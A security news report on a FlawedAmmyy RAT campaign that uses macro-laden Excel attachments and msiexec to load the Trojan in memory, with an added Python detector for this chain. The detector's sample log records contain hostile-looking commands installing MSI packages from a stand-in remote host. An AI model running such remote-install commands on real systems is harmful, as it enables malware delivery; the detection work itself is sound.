Monday, July 6, 22:33

FlawedAmmyy RAT is transmitted through a malware campaign

Microsoft has warned of a newly discovered malicious campaign that infects victims' systems with the notorious FlawedAmmyy RAT, loading the Trojan directly into memory rather than dropping it to disk.

FlawedAmmyy is a Remote Access Trojan (RAT) that gives attackers full control of a victim's machine and a foothold from which to move laterally across the network.

The Trojan can steal sensitive information from a system, such as files and login credentials, capture screenshots, and even give the attacker access to the victim's webcam.

The threat actor linked to earlier campaigns that deployed this malware is TA505, best known for distributing the Dridex banking Trojan and the Locky ransomware.

According to Microsoft, the attack begins with malicious emails written in Korean that carry .xls attachments.

As soon as the user opens the file, an embedded macro runs the legitimate msiexec.exe (Windows Installer) tool, which in turn downloads an MSI package.

Inside that MSI the attackers hide a digitally signed executable that, when run, decrypts and executes another executable in memory.

"This executable downloads and decrypts another file, wsus.exe, which is also digitally signed. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy," Microsoft Security Intelligence explains in a tweet.
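The step in this chain that is easiest to catch from endpoint telemetry is the first one: a spreadsheet process launching msiexec.exe with a remote package URL (Windows Installer will happily install straight from an http:// or https:// path). The script below is an added example written for this article, not Microsoft's detection logic or anything from the page; it parses constructed Sysmon-style process-creation records (invented sample data, field names modelled on Event ID 1) and flags two things: msiexec spawned by an Office application, and msiexec asked to install a package from a URL. Both at once is the pattern described above and is rated high.

```python
"""Flag the macro -> msiexec -> remote MSI step of the chain in process-creation logs."""
import re
from typing import Dict, List

# Constructed Sysmon-style process-creation (Event ID 1) records, flattened to
# key=value text for this example. They are invented sample data, not real logs.
SAMPLE_EVENTS = [
    # The campaign pattern: Excel (via a macro) launching msiexec with a URL package
    r'EventID=1 User=CORP\alice ParentImage="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /i http://203.0.113.10/update.msi /q"',
    # Benign: a user double-clicks a local .msi in Explorer
    r'EventID=1 User=CORP\bob ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /i C:\Users\bob\Downloads\7z.msi /qn"',
    # Remote package without an Office parent: still worth a look, lower severity
    r'EventID=1 User=CORP\carol ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\msiexec.exe CommandLine="msiexec.exe /package https://203.0.113.10/agent.msi /quiet"',
    # Office child process that is not msiexec: outside the scope of this rule
    r'EventID=1 User=CORP\dave ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c whoami"',
]

# key=value pairs; values may be double-quoted when they contain spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# A package argument fetched over HTTP(S) rather than from a local path
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)
# Office hosts that should not be launching an installer (assumed list)
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a field dictionary."""
    fields: Dict[str, str] = {}
    for key, quoted, raw in FIELD_RE.findall(line):
        fields[key] = quoted if quoted else raw
    return fields


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: Dict[str, str]) -> List[str]:
    """Return the names of the suspicious traits found in one event."""
    findings: List[str] = []
    if basename(event.get("Image", "")) != "msiexec.exe":
        return findings
    if basename(event.get("ParentImage", "")) in OFFICE_APPS:
        findings.append("office_spawned_msiexec")
    url = URL_RE.search(event.get("CommandLine", ""))
    if url:
        findings.append("msiexec_remote_package:" + url.group(0))
    return findings


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Scan records and return one alert per event that matched at least one trait."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        findings = analyse(event)
        if not findings:
            continue
        alerts.append({
            "user": event.get("User"),
            "parent": basename(event.get("ParentImage", "")),
            "findings": findings,
            # Office parent plus a remote package is the full campaign pattern
            "severity": "high" if len(findings) == 2 else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Two caveats when turning this into a production rule: msiexec is also invoked by legitimate software deployment, so a remote package alone should feed triage rather than page anyone, and the digital signatures on the dropped executables are not a reason to trust them; a valid signature on an unknown binary downloaded by a spreadsheet is itself worth an alert.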

Earlier this month, Trend Micro reported TA505 campaigns targeting several Latin American and Asian countries with FlawedAmmyy and other RATs, noting that the same infection mechanism had been in use for more than two months.

The threat actor has in fact been using backdoors such as FlawedAmmyy, Remote Manipulator System (RMS), ServHelper and others for more than six months.
